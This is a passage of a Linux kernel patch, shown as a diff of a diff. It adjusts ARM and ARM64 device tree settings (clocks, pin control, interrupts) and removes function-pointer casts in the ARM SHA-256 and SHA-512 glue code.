+ 	scifa0_pins: scifa0 {
+ 		groups = "scifa0_data";
+diff --git a/arch/arm/boot/dts/r8a73a4.dtsi b/arch/arm/boot/dts/r8a73a4.dtsi
+index c39066967053f..d1f4cbd099efb 100644
+--- a/arch/arm/boot/dts/r8a73a4.dtsi
++++ b/arch/arm/boot/dts/r8a73a4.dtsi
+@@ -450,17 +450,20 @@ clocks {
+ 		extalr_clk: extalr {
+ 			compatible = "fixed-clock";
+ 			#clock-cells = <0>;
+-			clock-frequency = <32768>;
++			/* This value must be overridden by the board. */
++			clock-frequency = <0>;
+ 		};
+ 		extal1_clk: extal1 {
+ 			compatible = "fixed-clock";
+ 			#clock-cells = <0>;
+-			clock-frequency = <25000000>;
++			/* This value must be overridden by the board. */
++			clock-frequency = <0>;
+ 		};
+ 		extal2_clk: extal2 {
+ 			compatible = "fixed-clock";
+ 			#clock-cells = <0>;
+-			clock-frequency = <48000000>;
++			/* This value must be overridden by the board. */
++			clock-frequency = <0>;
+ 		};
+ 		fsiack_clk: fsiack {
+ 			compatible = "fixed-clock";
+diff --git a/arch/arm/crypto/sha256_glue.c b/arch/arm/crypto/sha256_glue.c
+index 433ee4ddce6c8..f85933fdec75f 100644
+--- a/arch/arm/crypto/sha256_glue.c
++++ b/arch/arm/crypto/sha256_glue.c
+@@ -24,8 +24,8 @@
+ 
+ #include "sha256_glue.h"
+ 
+-asmlinkage void sha256_block_data_order(u32 *digest, const void *data,
+-					unsigned int num_blks);
++asmlinkage void sha256_block_data_order(struct sha256_state *state,
++					const u8 *data, int num_blks);
+ 
+ int crypto_sha256_arm_update(struct shash_desc *desc, const u8 *data,
+ 			     unsigned int len)
+@@ -33,23 +33,20 @@ int crypto_sha256_arm_update(struct shash_desc *desc, const u8 *data,
+ 	/* make sure casting to sha256_block_fn() is safe */
+ 	BUILD_BUG_ON(offsetof(struct sha256_state, state) != 0);
+ 
+-	return sha256_base_do_update(desc, data, len,
+-				(sha256_block_fn *)sha256_block_data_order);
++	return sha256_base_do_update(desc, data, len, sha256_block_data_order);
+ }
+ EXPORT_SYMBOL(crypto_sha256_arm_update);
+ 
+ static int crypto_sha256_arm_final(struct shash_desc *desc, u8 *out)
+ {
+-	sha256_base_do_finalize(desc,
+-				(sha256_block_fn *)sha256_block_data_order);
++	sha256_base_do_finalize(desc, sha256_block_data_order);
+ 	return sha256_base_finish(desc, out);
+ }
+ 
+ int crypto_sha256_arm_finup(struct shash_desc *desc, const u8 *data,
+ 			    unsigned int len, u8 *out)
+ {
+-	sha256_base_do_update(desc, data, len,
+-			      (sha256_block_fn *)sha256_block_data_order);
++	sha256_base_do_update(desc, data, len, sha256_block_data_order);
+ 	return crypto_sha256_arm_final(desc, out);
+ }
+ EXPORT_SYMBOL(crypto_sha256_arm_finup);
+diff --git a/arch/arm/crypto/sha512-glue.c b/arch/arm/crypto/sha512-glue.c
+index 0635a65aa488b..1be5bd498af36 100644
+--- a/arch/arm/crypto/sha512-glue.c
++++ b/arch/arm/crypto/sha512-glue.c
+@@ -25,27 +25,25 @@ MODULE_ALIAS_CRYPTO("sha512");
+ MODULE_ALIAS_CRYPTO("sha384-arm");
+ MODULE_ALIAS_CRYPTO("sha512-arm");
+ 
+-asmlinkage void sha512_block_data_order(u64 *state, u8 const *src, int blocks);
++asmlinkage void sha512_block_data_order(struct sha512_state *state,
++					u8 const *src, int blocks);
+ 
+ int sha512_arm_update(struct shash_desc *desc, const u8 *data,
+ 		      unsigned int len)
+ {
+-	return sha512_base_do_update(desc, data, len,
+-		(sha512_block_fn *)sha512_block_data_order);
++	return sha512_base_do_update(desc, data, len, sha512_block_data_order);
+ }
+ 
+ static int sha512_arm_final(struct shash_desc *desc, u8 *out)
+ {
+-	sha512_base_do_finalize(desc,
+-		(sha512_block_fn *)sha512_block_data_order);
++	sha512_base_do_finalize(desc, sha512_block_data_order);
+ 	return sha512_base_finish(desc, out);
+ }
+ 
+ int sha512_arm_finup(struct shash_desc *desc, const u8 *data,
+ 		     unsigned int len, u8 *out)
+ {
+-	sha512_base_do_update(desc, data, len,
+-		(sha512_block_fn *)sha512_block_data_order);
++	sha512_base_do_update(desc, data, len, sha512_block_data_order);
+ 	return sha512_arm_final(desc, out);
+ }
+ 
+diff --git a/arch/arm64/boot/dts/allwinner/sun50i-h6-beelink-gs1.dts b/arch/arm64/boot/dts/allwinner/sun50i-h6-beelink-gs1.dts
+index 9ec49ac2f6fd5..381d58cea092d 100644
+--- a/arch/arm64/boot/dts/allwinner/sun50i-h6-beelink-gs1.dts
++++ b/arch/arm64/boot/dts/allwinner/sun50i-h6-beelink-gs1.dts
+@@ -291,6 +291,8 @@ sw {
+ };
+ 
+ &spdif {
++	pinctrl-names = "default";
++	pinctrl-0 = <&spdif_tx_pin>;
+ 	status = "okay";
+ };
+ 
+diff --git a/arch/arm64/boot/dts/allwinner/sun50i-h6-tanix.dtsi b/arch/arm64/boot/dts/allwinner/sun50i-h6-tanix.dtsi
+index 4903d6358112d..855b7d43bc503 100644
+--- a/arch/arm64/boot/dts/allwinner/sun50i-h6-tanix.dtsi
++++ b/arch/arm64/boot/dts/allwinner/sun50i-h6-tanix.dtsi
+@@ -166,6 +166,8 @@ &r_ir {
+ };
+ 
+ &spdif {
++	pinctrl-names = "default";
++	pinctrl-0 = <&spdif_tx_pin>;
+ 	status = "okay";
+ };
+ 
+diff --git a/arch/arm64/boot/dts/allwinner/sun50i-h6.dtsi b/arch/arm64/boot/dts/allwinner/sun50i-h6.dtsi
+index ca1d287a0a01d..d11e5041bae9a 100644
+--- a/arch/arm64/boot/dts/allwinner/sun50i-h6.dtsi
++++ b/arch/arm64/boot/dts/allwinner/sun50i-h6.dtsi
+@@ -406,6 +406,7 @@ spi1_cs_pin: spi1-cs-pin {
+ 				function = "spi1";
+ 			};
+ 
++			/omit-if-no-ref/
+ 			spdif_tx_pin: spdif-tx-pin {
+ 				pins = "PH7";
+ 				function = "spdif";
+@@ -655,10 +656,8 @@ spdif: spdif@5093000 {
+ 			clocks = <&ccu CLK_BUS_SPDIF>, <&ccu CLK_SPDIF>;
+ 			clock-names = "apb", "spdif";
+ 			resets = <&ccu RST_BUS_SPDIF>;
+-			dmas = <&dma 2>;
+-			dma-names = "tx";
+-			pinctrl-names = "default";
+-			pinctrl-0 = <&spdif_tx_pin>;
++			dmas = <&dma 2>, <&dma 2>;
++			dma-names = "rx", "tx";
+ 			status = "disabled";
+ 		};
+ 
+diff --git a/arch/arm64/boot/dts/amazon/alpine-v2.dtsi b/arch/arm64/boot/dts/amazon/alpine-v2.dtsi
+index 4eb2cd14e00b0..9b6da84deae7a 100644
+--- a/arch/arm64/boot/dts/amazon/alpine-v2.dtsi
++++ b/arch/arm64/boot/dts/amazon/alpine-v2.dtsi
+@@ -145,7 +145,6 @@ pci@fbc00000 {
+ 		msix: msix@fbe00000 {
+ 			compatible = "al,alpine-msix";
+ 			reg = <0x0 0xfbe00000 0x0 0x100000>;
+-			interrupt-controller;
+ 			msi-controller;
+ 			al,msi-base-spi = <160>;
+ 			al,msi-num-spis = <160>;
+diff --git a/arch/arm64/boot/dts/amazon/alpine-v3.dtsi b/arch/arm64/boot/dts/amazon/alpine-v3.dtsi
+index 73a352ea8fd5c..b30014d4dc29c 100644
+--- a/arch/arm64/boot/dts/amazon/alpine-v3.dtsi
++++ b/arch/arm64/boot/dts/amazon/alpine-v3.dtsi
+@@ -351,7 +351,6 @@ pcie@fbd00000 {
+ 		msix: msix@fbe00000 {
+ 			compatible = "al,alpine-msix";
+ 			reg = <0x0 0xfbe00000 0x0 0x100000>;
+-			interrupt-controller;
+ 			msi-controller;
+ 			al,msi-base-spi = <336>;
+ 			al,msi-num-spis = <959>;
+diff --git a/arch/arm64/boot/dts/broadcom/bcmbca/bcm4908.dtsi b/arch/arm64/boot/dts/broadcom/bcmbca/bcm4908.dtsi
+index df71348542064..a4c5a38905b03 100644
+--- a/arch/arm64/boot/dts/broadcom/bcmbca/bcm4908.dtsi
++++ b/arch/arm64/boot/dts/broadcom/bcmbca/bcm4908.dtsi
+@@ -180,9 +180,6 @@ ethernet-switch@0 {
+ 				brcm,num-gphy = <5>;
+ 				brcm,num-rgmii-ports = <2>;
+ 
+-				#address-cells = <1>;
+-				#size-cells = <0>;
+-
+ 				ports: ports {
+ 					#address-cells = <1>;
+ 					#size-cells = <0>;
+diff --git a/arch/arm64/boot/dts/broadcom/northstar2/ns2.dtsi b/arch/arm64/boot/dts/broadcom/northstar2/ns2.dtsi
+index fda97c47f4e97..d5778417455c0 100644
+--- a/arch/arm64/boot/dts/broadcom/northstar2/ns2.dtsi
++++ b/arch/arm64/boot/dts/broadcom/northstar2/ns2.dtsi
+@@ -584,6 +584,7 @@ gpio_g: gpio@660a0000 {
+ 			#gpio-cells = <2>;
+ 			gpio-controller;
+ 			interrupt-controller;
++			#interrupt-cells = <2>;
+ 			interrupts = <GIC_SPI 400 IRQ_TYPE_LEVEL_HIGH>;
+ 		};
+ 
+diff --git a/arch/arm64/boot/dts/broadcom/stingray/stingray.dtsi b/arch/arm64/boot/dts/broadcom/stingray/stingray.dtsi
+index 8f8c25e51194d..473d7d0ddf369 100644
+--- a/arch/arm64/boot/dts/broadcom/stingray/stingray.dtsi
++++ b/arch/arm64/boot/dts/broadcom/stingray/stingray.dtsi
+@@ -442,6 +442,7 @@ gpio_hsls: gpio@d0000 {
+ 			#gpio-cells = <2>;
+ 			gpio-controller;
+ 			interrupt-controller;
++			#interrupt-cells = <2>;
+ 			interrupts = <GIC_SPI 183 IRQ_TYPE_LEVEL_HIGH>;
+ 			gpio-ranges = <&pinmux 0 0 16>,
+ 					<&pinmux 16 71 2>,
+diff --git a/arch/arm64/boot/dts/freescale/imx8mm-kontron-bl-osm-s.dts b/arch/arm64/boot/dts/freescale/imx8mm-kontron-bl-osm-s.dts
+index 8b16bd68576c0..d9fa0deea7002 100644
+--- a/arch/arm64/boot/dts/freescale/imx8mm-kontron-bl-osm-s.dts
++++ b/arch/arm64/boot/dts/freescale/imx8mm-kontron-bl-osm-s.dts
+@@ -294,8 +294,8 @@ MX8MM_IOMUXC_SAI3_MCLK_GPIO5_IO2		0x19
+ 
+ 	pinctrl_i2c4: i2c4grp {
+ 		fsl,pins = <
+-			MX8MM_IOMUXC_I2C4_SCL_I2C4_SCL			0x400001c3
+-			MX8MM_IOMUXC_I2C4_SDA_I2C4_SDA			0x400001c3
++			MX8MM_IOMUXC_I2C4_SCL_I2C4_SCL			0x40000083
++			MX8MM_IOMUXC_I2C4_SDA_I2C4_SDA			0x40000083
+ 		>;
+ 	};
+ 
+@@ -313,19 +313,19 @@ MX8MM_IOMUXC_SAI5_MCLK_GPIO3_IO25		0x19
+ 
+ 	pinctrl_uart1: uart1grp {
+ 		fsl,pins = <
+-			MX8MM_IOMUXC_SAI2_RXC_UART1_DCE_RX		0x140
+-			MX8MM_IOMUXC_SAI2_RXFS_UART1_DCE_TX		0x140
+-			MX8MM_IOMUXC_SAI2_RXD0_UART1_DCE_RTS_B		0x140
+-			MX8MM_IOMUXC_SAI2_TXFS_UART1_DCE_CTS_B		0x140
++			MX8MM_IOMUXC_SAI2_RXC_UART1_DCE_RX		0x0
++			MX8MM_IOMUXC_SAI2_RXFS_UART1_DCE_TX		0x0
++			MX8MM_IOMUXC_SAI2_RXD0_UART1_DCE_RTS_B		0x0
++			MX8MM_IOMUXC_SAI2_TXFS_UART1_DCE_CTS_B		0x0
+ 		>;
+ 	};
+ 
+ 	pinctrl_uart2: uart2grp {
+ 		fsl,pins = <
+-			MX8MM_IOMUXC_SAI3_TXFS_UART2_DCE_RX		0x140
+-			MX8MM_IOMUXC_SAI3_TXC_UART2_DCE_TX		0x140
+-			MX8MM_IOMUXC_SAI3_RXD_UART2_DCE_RTS_B		0x140
+-			MX8MM_IOMUXC_SAI3_RXC_UART2_DCE_CTS_B		0x140
++			MX8MM_IOMUXC_SAI3_TXFS_UART2_DCE_RX		0x0
++			MX8MM_IOMUXC_SAI3_TXC_UART2_DCE_TX		0x0
++			MX8MM_IOMUXC_SAI3_RXD_UART2_DCE_RTS_B		0x0
++			MX8MM_IOMUXC_SAI3_RXC_UART2_DCE_CTS_B		0x0
+ 		>;
+ 	};
+ 
+@@ -337,40 +337,40 @@ MX8MM_IOMUXC_NAND_CE1_B_GPIO3_IO2		0x19
+ 
+ 	pinctrl_usdhc2: usdhc2grp {
+ 		fsl,pins = <
+-			MX8MM_IOMUXC_SD2_CLK_USDHC2_CLK			0x190
++			MX8MM_IOMUXC_SD2_CLK_USDHC2_CLK			0x90
+ 			MX8MM_IOMUXC_SD2_CMD_USDHC2_CMD			0x1d0
+ 			MX8MM_IOMUXC_SD2_DATA0_USDHC2_DATA0		0x1d0
+ 			MX8MM_IOMUXC_SD2_DATA1_USDHC2_DATA1		0x1d0
+ 			MX8MM_IOMUXC_SD2_DATA2_USDHC2_DATA2		0x1d0
+ 			MX8MM_IOMUXC_SD2_DATA3_USDHC2_DATA3		0x1d0
+-			MX8MM_IOMUXC_SD2_CD_B_GPIO2_IO12		0x019
+-			MX8MM_IOMUXC_GPIO1_IO04_USDHC2_VSELECT		0x1d0
++			MX8MM_IOMUXC_SD2_CD_B_GPIO2_IO12		0x19
++			MX8MM_IOMUXC_GPIO1_IO04_USDHC2_VSELECT		0xd0
+ 		>;
+ 	};
+ 
+ 	pinctrl_usdhc2_100mhz: usdhc2-100mhzgrp {
+ 		fsl,pins = <
+-			MX8MM_IOMUXC_SD2_CLK_USDHC2_CLK			0x194
++			MX8MM_IOMUXC_SD2_CLK_USDHC2_CLK			0x94
+ 			MX8MM_IOMUXC_SD2_CMD_USDHC2_CMD			0x1d4
+ 			MX8MM_IOMUXC_SD2_DATA0_USDHC2_DATA0		0x1d4
+ 			MX8MM_IOMUXC_SD2_DATA1_USDHC2_DATA1		0x1d4
+ 			MX8MM_IOMUXC_SD2_DATA2_USDHC2_DATA2		0x1d4
+ 			MX8MM_IOMUXC_SD2_DATA3_USDHC2_DATA3		0x1d4
+-			MX8MM_IOMUXC_SD2_CD_B_GPIO2_IO12		0x019
+-			MX8MM_IOMUXC_GPIO1_IO04_USDHC2_VSELECT		0x1d0
++			MX8MM_IOMUXC_SD2_CD_B_GPIO2_IO12		0x19
++			MX8MM_IOMUXC_GPIO1_IO04_USDHC2_VSELECT		0xd0
+ 		>;
+ 	};
+ 
+ 	pinctrl_usdhc2_200mhz: usdhc2-200mhzgrp {
+ 		fsl,pins = <
+-			MX8MM_IOMUXC_SD2_CLK_USDHC2_CLK			0x196
++			MX8MM_IOMUXC_SD2_CLK_USDHC2_CLK			0x96
+ 			MX8MM_IOMUXC_SD2_CMD_USDHC2_CMD			0x1d6
+ 			MX8MM_IOMUXC_SD2_DATA0_USDHC2_DATA0		0x1d6
+ 			MX8MM_IOMUXC_SD2_DATA1_USDHC2_DATA1		0x1d6
+ 			MX8MM_IOMUXC_SD2_DATA2_USDHC2_DATA2		0x1d6
+ 			MX8MM_IOMUXC_SD2_DATA3_USDHC2_DATA3		0x1d6
+-			MX8MM_IOMUXC_SD2_CD_B_GPIO2_IO12		0x019
+-			MX8MM_IOMUXC_GPIO1_IO04_USDHC2_VSELECT		0x1d0
++			MX8MM_IOMUXC_SD2_CD_B_GPIO2_IO12		0x19
++			MX8MM_IOMUXC_GPIO1_IO04_USDHC2_VSELECT		0xd0
+ 		>;
+ 	};
+ };
+diff --git a/arch/arm64/boot/dts/freescale/imx8mm-kontron-bl.dts b/arch/arm64/boot/dts/freescale/imx8mm-kontron-bl.dts
+index a079322a37931..d54cddd65b526 100644
+--- a/arch/arm64/boot/dts/freescale/imx8mm-kontron-bl.dts
++++ b/arch/arm64/boot/dts/freescale/imx8mm-kontron-bl.dts
+@@ -277,8 +277,8 @@ MX8MM_IOMUXC_SAI3_MCLK_GPIO5_IO2		0x19
+ 
+ 	pinctrl_i2c4: i2c4grp {
+ 		fsl,pins = <
+-			MX8MM_IOMUXC_I2C4_SCL_I2C4_SCL			0x400001c3
+-			MX8MM_IOMUXC_I2C4_SDA_I2C4_SDA			0x400001c3
++			MX8MM_IOMUXC_I2C4_SCL_I2C4_SCL			0x40000083
++			MX8MM_IOMUXC_I2C4_SDA_I2C4_SDA			0x40000083
+ 		>;
+ 	};
+ 
+@@ -290,19 +290,19 @@ MX8MM_IOMUXC_SPDIF_RX_PWM2_OUT			0x19
+ 
+ 	pinctrl_uart1: uart1grp {
+ 		fsl,pins = <
+-			MX8MM_IOMUXC_SAI2_RXC_UART1_DCE_RX		0x140
+-			MX8MM_IOMUXC_SAI2_RXFS_UART1_DCE_TX		0x140
+-			MX8MM_IOMUXC_SAI2_RXD0_UART1_DCE_RTS_B		0x140
+-			MX8MM_IOMUXC_SAI2_TXFS_UART1_DCE_CTS_B		0x140
++			MX8MM_IOMUXC_SAI2_RXC_UART1_DCE_RX		0x0
++			MX8MM_IOMUXC_SAI2_RXFS_UART1_DCE_TX		0x0
++			MX8MM_IOMUXC_SAI2_RXD0_UART1_DCE_RTS_B		0x0
++			MX8MM_IOMUXC_SAI2_TXFS_UART1_DCE_CTS_B		0x0
+ 		>;
+ 	};
+ 
+ 	pinctrl_uart2: uart2grp {
+ 		fsl,pins = <
+-			MX8MM_IOMUXC_SAI3_TXFS_UART2_DCE_RX		0x140
+-			MX8MM_IOMUXC_SAI3_TXC_UART2_DCE_TX		0x140
+-			MX8MM_IOMUXC_SAI3_RXD_UART2_DCE_RTS_B		0x140
+-			MX8MM_IOMUXC_SAI3_RXC_UART2_DCE_CTS_B		0x140
++			MX8MM_IOMUXC_SAI3_TXFS_UART2_DCE_RX		0x0
++			MX8MM_IOMUXC_SAI3_TXC_UART2_DCE_TX		0x0
++			MX8MM_IOMUXC_SAI3_RXD_UART2_DCE_RTS_B		0x0
++			MX8MM_IOMUXC_SAI3_RXC_UART2_DCE_CTS_B		0x0
+ 		>;
+ 	};
+ 
+@@ -314,40 +314,40 @@ MX8MM_IOMUXC_NAND_CE1_B_GPIO3_IO2		0x19
+ 
+ 	pinctrl_usdhc2: usdhc2grp {
+ 		fsl,pins = <
+-			MX8MM_IOMUXC_SD2_CLK_USDHC2_CLK			0x190
++			MX8MM_IOMUXC_SD2_CLK_USDHC2_CLK			0x90
+ 			MX8MM_IOMUXC_SD2_CMD_USDHC2_CMD			0x1d0
+ 			MX8MM_IOMUXC_SD2_DATA0_USDHC2_DATA0		0x1d0
+ 			MX8MM_IOMUXC_SD2_DATA1_USDHC2_DATA1		0x1d0
+ 			MX8MM_IOMUXC_SD2_DATA2_USDHC2_DATA2		0x1d0
+ 			MX8MM_IOMUXC_SD2_DATA3_USDHC2_DATA3		0x1d0
+-			MX8MM_IOMUXC_SD2_CD_B_GPIO2_IO12		0x019
+-			MX8MM_IOMUXC_GPIO1_IO04_USDHC2_VSELECT		0x1d0
++			MX8MM_IOMUXC_SD2_CD_B_GPIO2_IO12		0x19
++			MX8MM_IOMUXC_GPIO1_IO04_USDHC2_VSELECT		0xd0
+ 		>;
+ 	};
+ 
+ 	pinctrl_usdhc2_100mhz: usdhc2-100mhzgrp {
+ 		fsl,pins = <
+-			MX8MM_IOMUXC_SD2_CLK_USDHC2_CLK			0x194
++			MX8MM_IOMUXC_SD2_CLK_USDHC2_CLK			0x94
+ 			MX8MM_IOMUXC_SD2_CMD_USDHC2_CMD			0x1d4
+ 			MX8MM_IOMUXC_SD2_DATA0_USDHC2_DATA0		0x1d4
+ 			MX8MM_IOMUXC_SD2_DATA1_USDHC2_DATA1		0x1d4
+ 			MX8MM_IOMUXC_SD2_DATA2_USDHC2_DATA2		0x1d4
+ 			MX8MM_IOMUXC_SD2_DATA3_USDHC2_DATA3		0x1d4
+-			MX8MM_IOMUXC_SD2_CD_B_GPIO2_IO12		0x019
+-			MX8MM_IOMUXC_GPIO1_IO04_USDHC2_VSELECT		0x1d0
++			MX8MM_IOMUXC_SD2_CD_B_GPIO2_IO12		0x19
++			MX8MM_IOMUXC_GPIO1_IO04_USDHC2_VSELECT		0xd0
+ 		>;
+ 	};
+ 
+ 	pinctrl_usdhc2_200mhz: usdhc2-200mhzgrp {
+ 		fsl,pins = <
+-			MX8MM_IOMUXC_SD2_CLK_USDHC2_CLK			0x196
++			MX8MM_IOMUXC_SD2_CLK_USDHC2_CLK			0x96
+ 			MX8MM_IOMUXC_SD2_CMD_USDHC2_CMD			0x1d6
+ 			MX8MM_IOMUXC_SD2_DATA0_USDHC2_DATA0		0x1d6
+ 			MX8MM_IOMUXC_SD2_DATA1_USDHC2_DATA1		0x1d6
+ 			MX8MM_IOMUXC_SD2_DATA2_USDHC2_DATA2		0x1d6
+ 			MX8MM_IOMUXC_SD2_DATA3_USDHC2_DATA3		0x1d6
+-			MX8MM_IOMUXC_SD2_CD_B_GPIO2_IO12		0x019
+-			MX8MM_IOMUXC_GPIO1_IO04_USDHC2_VSELECT		0x1d0
++			MX8MM_IOMUXC_SD2_CD_B_GPIO2_IO12		0x19
++			MX8MM_IOMUXC_GPIO1_IO04_USDHC2_VSELECT		0xd0
+ 		>;
+ 	};
+ };
+diff --git a/arch/arm64/boot/dts/freescale/imx8mm-kontron-osm-s.dtsi b/arch/arm64/boot/dts/freescale/imx8mm-kontron-osm-s.dtsi
+index 8d10f5b412978..d5199ecb3f6c1 100644
+--- a/arch/arm64/boot/dts/freescale/imx8mm-kontron-osm-s.dtsi
++++ b/arch/arm64/boot/dts/freescale/imx8mm-kontron-osm-s.dtsi
+@@ -205,7 +205,7 @@ rtc@52 {
+ 		reg = <0x52>;
+ 		pinctrl-names = "default";
+ 		pinctrl-0 = <&pinctrl_rtc>;
+-		interrupts-extended = <&gpio4 1 IRQ_TYPE_LEVEL_HIGH>;
++		interrupts-extended = <&gpio4 1 IRQ_TYPE_LEVEL_LOW>;
+ 		trickle-diode-disable;
+ 	};
+ };
+@@ -247,8 +247,8 @@ MX8MM_IOMUXC_ECSPI1_SS0_GPIO5_IO9		0x19
+ 
+ 	pinctrl_i2c1: i2c1grp {
+ 		fsl,pins = <
+-			MX8MM_IOMUXC_I2C1_SCL_I2C1_SCL			0x400001c3
+-			MX8MM_IOMUXC_I2C1_SDA_I2C1_SDA			0x400001c3
++			MX8MM_IOMUXC_I2C1_SCL_I2C1_SCL			0x40000083
++			MX8MM_IOMUXC_I2C1_SDA_I2C1_SDA			0x40000083
+ 		>;
+ 	};
+ 
+diff --git a/arch/arm64/boot/dts/freescale/imx8mm-kontron-sl.dtsi b/arch/arm64/boot/dts/freescale/imx8mm-kontron-sl.dtsi
+index 0679728d24899..884ae2ad35114 100644
+--- a/arch/arm64/boot/dts/freescale/imx8mm-kontron-sl.dtsi
++++ b/arch/arm64/boot/dts/freescale/imx8mm-kontron-sl.dtsi
+@@ -237,8 +237,8 @@ MX8MM_IOMUXC_ECSPI1_SS0_GPIO5_IO9		0x19
+ 
+ 	pinctrl_i2c1: i2c1grp {
+ 		fsl,pins = <
+-			MX8MM_IOMUXC_I2C1_SCL_I2C1_SCL			0x400001c3
+-			MX8MM_IOMUXC_I2C1_SDA_I2C1_SDA			0x400001c3
++			MX8MM_IOMUXC_I2C1_SCL_I2C1_SCL			0x40000083
++			MX8MM_IOMUXC_I2C1_SDA_I2C1_SDA			0x40000083
+ 		>;
+ 	};
+ 
+diff --git a/arch/arm64/boot/dts/freescale/imx8mm-venice-gw71xx.dtsi b/arch/arm64/boot/dts/freescale/imx8mm-venice-gw71xx.dtsi
+index c557dbf4dcd60..2e90466db89a0 100644
+--- a/arch/arm64/boot/dts/freescale/imx8mm-venice-gw71xx.dtsi
++++ b/arch/arm64/boot/dts/freescale/imx8mm-venice-gw71xx.dtsi
+@@ -47,17 +47,6 @@ pps {
+ 		gpios = <&gpio1 15 GPIO_ACTIVE_HIGH>;
+ 		status = "okay";
+ 	};
+-
+-	reg_usb_otg1_vbus: regulator-usb-otg1 {
+-		pinctrl-names = "default";
+-		pinctrl-0 = <&pinctrl_reg_usb1_en>;
+-		compatible = "regulator-fixed";
+-		regulator-name = "usb_otg1_vbus";
+-		gpio = <&gpio1 10 GPIO_ACTIVE_HIGH>;
+-		enable-active-high;
+-		regulator-min-microvolt = <5000000>;
+-		regulator-max-microvolt = <5000000>;
+-	};
+ };
+ 
+ /* off-board header */
+@@ -146,9 +135,10 @@ &uart3 {
+ };
+ 
+ &usbotg1 {
++	pinctrl-names = "default";
++	pinctrl-0 = <&pinctrl_usbotg1>;
+ 	dr_mode = "otg";
+ 	over-current-active-low;
+-	vbus-supply = <&reg_usb_otg1_vbus>;
+ 	status = "okay";
+ };
+ 
+@@ -206,14 +196,6 @@ MX8MM_IOMUXC_GPIO1_IO15_GPIO1_IO15	0x41
+ 		>;
+ 	};
+ 
+-	pinctrl_reg_usb1_en: regusb1grp {
+-		fsl,pins = <
+-			MX8MM_IOMUXC_GPIO1_IO10_GPIO1_IO10	0x41
+-			MX8MM_IOMUXC_GPIO1_IO12_GPIO1_IO12	0x141
+-			MX8MM_IOMUXC_GPIO1_IO13_USB1_OTG_OC	0x41
+-		>;
+-	};
+-
+ 	pinctrl_spi2: spi2grp {
+ 		fsl,pins = <
+ 			MX8MM_IOMUXC_ECSPI2_SCLK_ECSPI2_SCLK	0xd6
+@@ -236,4 +218,11 @@ MX8MM_IOMUXC_UART3_RXD_UART3_DCE_RX	0x140
+ 			MX8MM_IOMUXC_UART3_TXD_UART3_DCE_TX	0x140
+ 		>;
+ 	};
++
++	pinctrl_usbotg1: usbotg1grp {
++		fsl,pins = <
++			MX8MM_IOMUXC_GPIO1_IO12_GPIO1_IO12	0x141
++			MX8MM_IOMUXC_GPIO1_IO13_USB1_OTG_OC	0x41
++		>;
++	};
+ };
+diff --git a/arch/arm64/boot/dts/lg/lg1312.dtsi b/arch/arm64/boot/dts/lg/lg1312.dtsi
+index 78ae73d0cf365..98ff17b14b2a5 100644
+--- a/arch/arm64/boot/dts/lg/lg1312.dtsi
++++ b/arch/arm64/boot/dts/lg/lg1312.dtsi
+@@ -124,7 +124,6 @@ eth0: ethernet@c1b00000 {
+ 	amba {
+ 		#address-cells = <2>;
+ 		#size-cells = <1>;
+-		#interrupt-cells = <3>;
+ 
+ 		compatible = "simple-bus";
+ 		interrupt-parent = <&gic>;
+diff --git a/arch/arm64/boot/dts/lg/lg1313.dtsi b/arch/arm64/boot/dts/lg/lg1313.dtsi
+index 2173316573bee..8e9410d8f46c0 100644
+--- a/arch/arm64/boot/dts/lg/lg1313.dtsi
++++ b/arch/arm64/boot/dts/lg/lg1313.dtsi
+@@ -124,7 +124,6 @@ eth0: ethernet@c3700000 {
+ 	amba {
+ 		#address-cells = <2>;
+ 		#size-cells = <1>;
+-		#interrupt-cells = <3>;
+ 
+ 		compatible = "simple-bus";
+ 		interrupt-parent = <&gic>;
+diff --git a/arch/arm64/boot/dts/marvell/armada-37xx.dtsi b/arch/arm64/boot/dts/marvell/armada-37xx.dtsi
+index df152c72276b8..cd28e1c45b70a 100644
+--- a/arch/arm64/boot/dts/marvell/armada-37xx.dtsi
++++ b/arch/arm64/boot/dts/marvell/armada-37xx.dtsi
+@@ -426,14 +426,14 @@ xor11 {
+ 			crypto: crypto@90000 {
+ 				compatible = "inside-secure,safexcel-eip97ies";
+ 				reg = <0x90000 0x20000>;
+-				interrupts = <GIC_SPI 19 IRQ_TYPE_LEVEL_HIGH>,
+-					     <GIC_SPI 20 IRQ_TYPE_LEVEL_HIGH>,
++				interrupts = <GIC_SPI 20 IRQ_TYPE_LEVEL_HIGH>,
+ 					     <GIC_SPI 21 IRQ_TYPE_LEVEL_HIGH>,
+ 					     <GIC_SPI 22 IRQ_TYPE_LEVEL_HIGH>,
+ 					     <GIC_SPI 23 IRQ_TYPE_LEVEL_HIGH>,
+-					     <GIC_SPI 24 IRQ_TYPE_LEVEL_HIGH>;
+-				interrupt-names = "mem", "ring0", "ring1",
+-						  "ring2", "ring3", "eip";
++					     <GIC_SPI 24 IRQ_TYPE_LEVEL_HIGH>,
++					     <GIC_SPI 19 IRQ_TYPE_LEVEL_HIGH>;
++				interrupt-names = "ring0", "ring1", "ring2",
++						  "ring3", "eip", "mem";
+ 				clocks = <&nb_periph_clk 15>;
+ 			};
+ 
+diff --git a/arch/arm64/boot/dts/marvell/armada-ap80x.dtsi b/arch/arm64/boot/dts/marvell/armada-ap80x.dtsi
+index a06a0a889c43f..73d8803b54d8b 100644
+--- a/arch/arm64/boot/dts/marvell/armada-ap80x.dtsi
++++ b/arch/arm64/boot/dts/marvell/armada-ap80x.dtsi
+@@ -133,7 +133,6 @@ pmu {
+ 
+ 			odmi: odmi@300000 {
+ 				compatible = "marvell,odmi-controller";
+-				interrupt-controller;
+ 				msi-controller;
+ 				marvell,odmi-frames = <4>;
+ 				reg = <0x300000 0x4000>,
+diff --git a/arch/arm64/boot/dts/marvell/armada-cp11x.dtsi b/arch/arm64/boot/dts/marvell/armada-cp11x.dtsi
+index d6c0990a267d9..218c059b16d9c 100644
+--- a/arch/arm64/boot/dts/marvell/armada-cp11x.dtsi
++++ b/arch/arm64/boot/dts/marvell/armada-cp11x.dtsi
+@@ -506,14 +506,14 @@ CP11X_LABEL(sdhci0): mmc@780000 {
+ 		CP11X_LABEL(crypto): crypto@800000 {
+ 			compatible = "inside-secure,safexcel-eip197b";
+ 			reg = <0x800000 0x200000>;
+-			interrupts = <87 IRQ_TYPE_LEVEL_HIGH>,
+-				<88 IRQ_TYPE_LEVEL_HIGH>,
++			interrupts = <88 IRQ_TYPE_LEVEL_HIGH>,
+ 				<89 IRQ_TYPE_LEVEL_HIGH>,
+ 				<90 IRQ_TYPE_LEVEL_HIGH>,
+ 				<91 IRQ_TYPE_LEVEL_HIGH>,
+-				<92 IRQ_TYPE_LEVEL_HIGH>;
